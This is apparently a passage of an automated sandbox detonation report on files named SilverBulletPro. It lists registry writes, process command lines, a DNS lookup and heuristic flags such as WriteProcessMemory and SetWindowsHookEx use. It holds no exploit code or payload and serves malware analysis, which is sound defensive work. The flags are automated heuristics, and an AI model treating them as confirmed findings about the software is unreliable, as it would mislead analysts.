| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe\shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe\shell\open | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe\shell\open\command\ = "\"C:\\Program Files\\dotnet\\dotnet.exe\" \"%1\"" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Applications\dotnet.exe\shell\open\command | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2988 wrote to memory of 5008 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\dotnet\dotnet.exe |
| PID 2988 wrote to memory of 5008 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\dotnet\dotnet.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.CLI.Core.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\dotnet\dotnet.exe
"C:\Program Files\dotnet\dotnet.exe" "C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.CLI.Core.pdb"
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
136s
Max time network
154s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe
"C:\Users\Admin\AppData\Local\Temp\SilverBulletPro.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/3852-0-0x00007FFE3E073000-0x00007FFE3E075000-memory.dmp
memory/3852-1-0x0000024B6DB40000-0x0000024B6E00E000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240426-en
Max time kernel
140s
Max time network
156s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Tessernet\libtesseract500.dll,#1
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
131s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.Core.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-09 22:02
Reported
2024-06-09 22:41
Platform
win11-20240508-en
Max time kernel
108s
Max time network
94s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe\shell\open\command | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 8c00310000000000a858066e110050524f4752417e310000740009000400efbec5525961a858066e2e0000003f0000000000010000000000000000004a0000000000284ec700500072006f006700720061006d002000460069006c0065007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370038003100000018000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe\shell\open\command\ = "\"C:\\Program Files\\dotnet\\dotnet.exe\" \"%1\"" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe\shell\open | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \Registry\User\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\NotificationData | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 5400310000000000a858fc681000646f746e657400003e0009000400efbea858dd68a858fc682e000000426102000000070000000000000000000000000000008a68550064006f0074006e0065007400000016000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Applications\dotnet.exe\shell | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1920 wrote to memory of 4924 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\dotnet\dotnet.exe |
| PID 1920 wrote to memory of 4924 | N/A | C:\Windows\system32\OpenWith.exe | C:\Program Files\dotnet\dotnet.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.Win.Core.pdb
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\dotnet\dotnet.exe
"C:\Program Files\dotnet\dotnet.exe" "C:\Users\Admin\AppData\Local\Temp\bin\SilverBulletPro.Win.Core.pdb"
Network
| Country | Destination | Domain | Proto |
